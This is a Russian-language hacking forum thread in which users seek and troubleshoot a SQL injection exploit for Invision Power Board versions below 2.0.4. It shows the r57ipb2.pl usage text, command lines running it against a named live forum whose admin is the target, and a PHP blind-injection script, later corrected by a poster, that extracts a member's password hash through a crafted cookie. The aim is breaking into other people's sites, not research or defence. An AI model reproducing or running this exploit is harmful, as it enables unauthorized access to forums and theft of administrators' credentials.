Исправный сплоит под ИПБ 2.0.4
 

у кого есть сплоит без бага если не трудно вышлите на devil_155@mail.ru
И можно описать как конкретно им пользоваться и можно ли использовать для этого прогу perl5_6_0_small

Smotri video, chitai i practikyisia. A exploiti kachai s antichata-oni good =)

а ссылочку конкретно не подкинешь? на сплоит?

лолы, я такого сплойта не видел, а так иди на сайт RusH'евцев www.rst.void.ru

Microsoft Windows XP [Версия 5.1.2600]
(С) Корпорация Майкрософт, 1985-2001.

C:\Documents and Settings\Devil>cd\

C:\>Perl\bin\perl.exe C:\ipb.pl http://ns-forum.net/ 1 0
Can't locate IO/Socket.pm in @INC (@INC contains: C:/Perl/lib .) at C:\ipb.pl li
ne 37.
BEGIN failed--compilation aborted at C:\ipb.pl line 37.

Что я делаю не так?

Если не трудно напишите какие команды нужно вводить =)

devil
У тебя не стоит ActivePerl, скачай его с www.denwer.ru и поставь, потом все делай так же...

А вводить чуть по другому надо, если форум стоит в головном каталоге то пиши так:
C:\>Perl\bin\perl.exe C:\ipb.pl http://ns-forum.net / 1 0 просто слеш надо ставить там где указываешь [/folder/]

И к сведению, там стоит форум =>2.*, так что пиши не 0, а 1!

а так-же, там нету пользователя с Id=1, вот рябетня, а баги проштопали...

У меня стоит перл, только демо версия, а пользователь там такой есть, ник Серж, админ =)

ЧЕГО ЧЕГО?! впервые слышу чтоб у перла есть демо-версия...

а что делать, если пишет can't locate object method "get" via package "LWP::UserAgent"
версия перла 5.6.1.631..
PS сорь, что не по теме..

Да блин :( тупой чтоли!? Извиняюсь, Актив перл поставь, и баги будет меньши...

актив перл стоит.. библиотеки навена не хватает, а откуда скачать я нинаю..

качай актив перл новый с денвера
http://denwer.ru

Если совсем ламо, на ссылку http://www.denwer.ru/dis/ActivePerl/...ePerl5.6.1.exe

http://downloads.activestate.com/Act...SWin32-x86.msi

перл под форточки с инсталятором.

М-дааа народ, а что уже ручками никак пользоваться не получается, ведь есть такая 4тука как яндекс, гугла, рамблер...

блин нифига не шарю...чо опять не так?
Подскажите правильную строчку
C:\>perl\bin\bin\perl.exe c:\ipbhack.pl ns-forum.net/ 2 1

Invision Power Board v < 2.0.4 SQL injection exploit
----------------------------------------------------
USAGE:
~~~~~~
r57ipb2.pl [server] [/folder/] [member_id] [target]

[server] - host where IPB installed
[/folder/] - folder where IPB installed
[member_id] - user id for brute

targets:
0 - IPB 1.*
1 - IPB 2.* (Prior To 2.0.4)

e.g. r57ipb2.pl 127.0.0.1 /IPB/ 1 1
----------------------------------------------------
(c)oded by 1dt.w0lf
RST/GHC , http://rst.void.ru , http://ghc.ru

вся спасибо я нашёл ошибку...только дыру залатали уже -((

WizART
да слышь, харе уже.....
просто у миня всё было... (актив перл) а LWP не пашет...
devil
ну есессно заделали, не идиоты ведь, навена..

ладно, поф на юзерагент
объясните, вот тут ошибка в 7 строке пишет, но почему??
<?
set_time_limit(999999);
$zap="http://staff/forum/index.php?act=Login&CODE=autologin" ;
$user=3;
$sh=array("0","1","2","3","4","5","6","7","8","9", "a","b","c ","d","e","f");
$hash=;
for( $i=1; $i <33; $i++ ){
for( $j=0; $j < 16; $j++ ){
$current=$sh[$j];
$sql="99%2527+OR+(id%3d$user+AND+MID(password,$i,1 )%3d%2527$ current%2527)/*";
#$sql="99%2527+OR+(id%3d$user+AND+MID(member_login _key,$i,1) %3d%2527$current%2527)/*";
$cook="pass_hash=$sql;member_id=$user";
$ch = curl_init();
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
curl_setopt($ch, CURLOPT_HEADER, 2);
curl_setopt($ch, CURLOPT_URL, $zap);
curl_setopt($ch, CURLOPT_COOKIE, $cook);
$xyz = curl_exec ($ch);
curl_close ($ch);
if (preg_match("/CODE/i", $xyz)) {
} else {
$hash.=$sh[$j];
}
}
}
echo $hash;
?>

М-даа...фатально...

Подскажите , почему место хеша мне выдаёт такую хрень: ******************

иЩи АшиПки и правь сплойт!

2 ProTeuS нет там общибок просто сплойт старый а форум пропаченный...
вот и выдает ***** или 0000

А где можно сплоит новый найти?))))

Loo
В скрипте куча ошибок.
Вот с исправлениями:

<?
set_time_limit(0);
$zap='http://.ua/forum/index.php?act=Login&CODE=autologin' ;
$user=1;
$sh=array('0','1','2','3','4','5','6','7','8','9', 'a','b','c','d','e','f');
$hash='';
for( $i=1; $i < 33; $i++ ){
for( $j=0; $j < 16; $j++ ){
$current=$sh[$j];
$sql='99%2527+OR+(id%3d'.$user.'+AND+MID(password, '.$i.',1)%3d%2527'.$current.'%2527)/*';
//Для ИПБ 2.*
//$sql="99%2527+OR+(id%3d$user+AND+MID(member_login_ key,$i,1) %3d%2527$current%2527)/*";
$cook='pass_hash='.$sql.';member_id='.$user.'';
$ch = curl_init();
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
curl_setopt($ch, CURLOPT_HEADER, 2);
curl_setopt($ch, CURLOPT_URL, $zap);
curl_setopt($ch, CURLOPT_COOKIE, $cook);
$xyz = curl_exec($ch);
curl_close ($ch);
if (preg_match("/CODE/i", $xyz)) {
}
else
{
$hash.=$sh[$j];
}
}
}
echo $hash;
?>

$crcheck = ""; вот тут ашипка, поставь нужное значение (=$i) между кавычками и будет тебе хеш вместо ****
$crcheck = "=$i";